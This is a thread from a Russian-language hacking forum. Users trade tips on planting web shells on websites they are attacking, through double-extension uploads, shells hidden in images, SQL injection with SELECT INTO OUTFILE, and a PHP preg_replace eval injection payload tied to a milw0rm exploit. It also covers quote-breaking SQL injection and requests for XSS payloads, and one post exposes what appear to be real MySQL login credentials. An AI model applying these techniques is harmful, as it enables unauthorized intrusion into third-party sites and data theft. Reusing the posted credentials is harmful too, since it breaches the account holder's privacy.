вот акк на тестовый период и там они дают полную версию так что и на платку по идее должна быть полная версия phpmyadmin Данные для работы с базой данных MySQL : mySQL server: localhost mySQL database: test3serv316 mySQL login: u_test3serv316 mySQL password: RqJt6A0p phpMyAdmin: http://test3servdb.mirohost.net
Плфтный пхпмайадмин скорее всего даётся на определённый ip адрес, по крайней мерее так на большенстве хостингов. Например так: https://хх.ххх.хх.ххх:хххх
2 bug1z то есть , по другому никак ? Я уже пробовал так (shell.jpg.php ) Возможно есть другой способ ? PS: У кого есть html shell ?
Пасс админа уже есть, но директория site.com/administrator/ закрыта файлом .htaccess, поэтому и спрашиваю про sql-inj
при воде ковычек выдает ошибку ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. /index.asp, line 21
чтобы залить шелл только через sql-inj, нужно file_priv = Y magic_quotes_gpc=OFF иметь директорию,видимую из вэба, на запись. тогда шелл заливается запросом select into outfile.
Почему же, есть и другие способы, например запихнуть шелл в картинку, об этом можешь почитать здесь(юзай поиск ) Так же посмотри, нету ли в админке ф-и для добавления формата загружаемых файлов... Если и эти способы не прокатят, зна не судьба залить через админку(ИМХО). В этом случае ищи баг на сайте с помощю которого есть возможность залить шелл, это например SQL inj или php include, с их помощю можно будет залить шелл(ЕСЛИ ПОВЕЗЁТ!!!)
Это скорее всего MSSQL и тута не чего не попишеш... хотя хз Ищи ошибку вот такого вида Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near 'NO'. /prodDetails.asp, line 1282 И смотри >>Здесь<<
Вообщем есть сплойт. Code: http://milw0rm.com/exploits/4851 Даже если забиваю этого кусок кода на локальхост PHP: $source = htmlspecialchars($text); $source = preg_replace( '/<!--(.*?)-->/es', '"<span style=\"color: ".$options["color"]["comment"].";\"><!--". str_replace("<","<<!-- -->", str_replace("=","=<!-- -->", "$1")). "--></span>"', $source); и тестю Code: html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo(); И собсна он не выполняет phpinfo...Вопрос почему?...в регурялках я не разбираюсь пока....в чём соль? версия php?
Ошибка говорит о том, что ты передаёшь, не существующий URL параметр. Дабы небыло такой ошибки часто место неё выводят MsgBox. Пример: Code: <% If rsProfile.EOF And rsProfile.BOF Then %> <script language="VBScript"> dim Message Message=MsgBox("Такой записи не существует",65,"Ошибка") document.write(Message) </script> <% End If %> Имхо инъекции здесь нету!
где можно взять полный список этих "параметров(или хз как их назвать)" для проведения xss. или это полный список?
как обойти такую штуку, есть склинк, нефильтруется, но находится в кавычках, как обойти? пример site.com/index?id=1'ляляля error SELECT * FROM table WHERE '1'ляляля' <!-- +--+ # /* неработает
udman не можешь закоментировать кавычку,честно говоря никогда не встречал такого(, но действовал бы в стиле такого site.com/index?id=1'+and+'1'='2
Я и товарищь bug1z уже отвечали те на этот вопрос.... по моему даже очень доступно. Или ты любиш биться головой о стену......
Не будет. Смотри, н.п. такой запрос есть: PHP: mysql_query("SELECT column FROM table WHERE id='".$_GET['id'])."'" Т.е. id в кавычках. Если ты напишешь 1'+and+'1'='2', запрос будет Code: SELECT column FROM table WHERE id='1' and '1'='2'[B][COLOR=Red]'[/COLOR][/B] Синтаксис некорректный, т.к. есть лишняя кавычка. Выход - комментарии. Если же без последнего аппострофа, Code: SELECT column FROM table WHERE id='1' and '1'='2' Кавычка будет закрыта.
